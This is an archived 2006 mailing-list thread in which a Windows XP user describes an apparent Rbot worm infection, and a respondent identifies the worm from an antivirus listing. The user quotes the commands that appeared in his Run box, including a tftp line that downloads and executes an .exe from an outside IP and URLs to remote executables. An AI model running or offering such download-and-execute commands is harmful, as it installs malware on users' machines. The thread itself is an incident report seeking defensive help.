Sounds like:

http://www.avira.com/en/threats/section/fulldetails/id_vir/1496/worm_rbot.aeu.79.html

BTW, tried the IRC server, it's down. Sounds like an old botnet.
I've also stumbled across (and misplaced) a website that claimed it
could come from using a web browser that supports VBS.

Regards & good luck,
Peter

On 05/10/06, Carey Fisher - NCS <careyfisher@ncsradio.com> wrote:
> Today, as I was sitting at my WINXP machine working, the START/Run window popped open and some unknown force typed the following:
>
> http://homepage.my-place.us/system.exe
>
> Well, I immediately disabled the network connection and I don't think this program was executed.
>
> Then I scrolled through the Run window and found the following 3 lines:
>
> cmd /c tftp -i 10.0.6.28 GET wfudpgemr.exe &wfudpgemr.exe &exit
> http://kruma.us/vn.exe
> %SYSTEMROOT%\SYSTEM32\CMD.EXE
>
> This really surprised me since I've taken a lot of measures to secure my system including a program that won't let new programs run without my permission.   This is why the first one didn't run.  I also run antivirus, I monitor the router/firewall with Wallwatcher, and I block all inbound ports except a couple (Skype, FreeVNC).
>
> Anybody know anything about any of these apparent attacks.  Any suggestions to prevent this particular exploit (START/Run)?
>
> Thanks,
> Carey
> --
> http://www.piclist.com PIC/SX FAQ & list archive
> View/change your membership options at
> http://mailman.mit.edu/mailman/listinfo/piclist
>
-- 
http://www.piclist.com PIC/SX FAQ & list archive
View/change your membership options at
http://mailman.mit.edu/mailman/listinfo/piclist